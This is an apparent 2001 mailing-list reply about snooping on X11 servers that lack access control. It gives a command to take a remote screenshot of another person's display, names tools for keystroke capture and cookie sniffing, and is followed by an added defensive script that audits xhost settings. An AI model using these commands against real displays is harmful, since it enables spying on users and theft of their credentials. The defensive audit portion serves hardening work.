Power Steve wrote:
>
> Anyone know if you can meaningfully sniff Exceed (I guess it's the same as
> X) traffic? I'm being a bit lame, my personal test lab is down atm, and I
> can't find anything on the net re sniffing and interpreting X traffic.

You can have quite a bit of 'fun' with X11.

i.e.

If someone is running an unprotected X server - not using MIT Magic Cookies
or xhost authentication properly for example (they have issued 'xhost +'
...) - then you can easily grab a screenshot of their X display
(remotely).

Grab:

    /usr/X/bin/xwd x11user.victum.com:0 -root -out /tmp/i_can_see_you.dmp

(:0 indicates the first X display - this listens on port 6000, :1 would
be port 6001 etc.)

View:

    /usr/X/bin/xwud -in /tmp/i_can_see_you.dmp

Out of the box, the Exceed X11 server places no restrictions on remote
connections... :-(

xspy - http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html - can be
used to capture keystrokes from an X server. You don't need much of an
imagination to realize what sort of thing it can be used for :-).

Pretty much any packet sniffer can grab X11 packets. AFAIK dsniff will
sniff MIT Magic cookies.

Cheers,

Mike.
Received on Aug 13 2001
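
A defensive check for the condition the post describes, added here as an example and not part of the original message: it classifies the output of `xhost` (run with no arguments on the machine hosting the display) and maps a display name to the TCP port to firewall. The function names, return codes and sample output are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original post. Sample xhost output is constructed.

# Map an X display name (":1", "host:0.0") to its TCP port: 6000 + display number.
display_port() {
    dp_n=${1##*:}        # drop everything up to the last colon
    dp_n=${dp_n%%.*}     # drop the optional ".screen" suffix
    case "$dp_n" in
        ''|*[!0-9]*) echo "invalid display: $1" >&2; return 2 ;;
    esac
    echo $((6000 + dp_n))
}

# Read `xhost` output on stdin and print one finding per line.
# Return 0 = per-user grants only, 1 = access control disabled, 2 = host-based trust.
audit_xhost() {
    ax_rc=0
    while IFS= read -r ax_line; do
        case "$ax_line" in
            "access control disabled"*)
                echo "RISK: access control disabled (xhost +), any host may connect"
                ax_rc=1 ;;
            "access control enabled"*)
                echo "OK: access control enabled" ;;
            INET:*|INET6:*)
                echo "WARN: $ax_line trusts every user on that host"
                [ "$ax_rc" -eq 0 ] && ax_rc=2 ;;
            SI:localuser:*)
                echo "OK: $ax_line is a per-user local grant" ;;
            '') ;;
            *)  echo "REVIEW: $ax_line" ;;
        esac
    done
    return "$ax_rc"
}

# Constructed samples of xhost output: open, host-based, and locked down.
SAMPLE_OPEN='access control disabled, clients can connect from any host'
SAMPLE_HOSTS='access control enabled, only authorized clients can connect
INET:build01.example.test
SI:localuser:alice'
SAMPLE_LOCKED='access control enabled, only authorized clients can connect
SI:localuser:alice'

for s in "$SAMPLE_OPEN" "$SAMPLE_HOSTS" "$SAMPLE_LOCKED"; do
    printf '%s\n' "$s" | audit_xhost; echo "-> exit $?"
done
```

On a live system, pipe the real output in with `xhost | audit_xhost`; a return code of 1 corresponds to the 'xhost +' state described above.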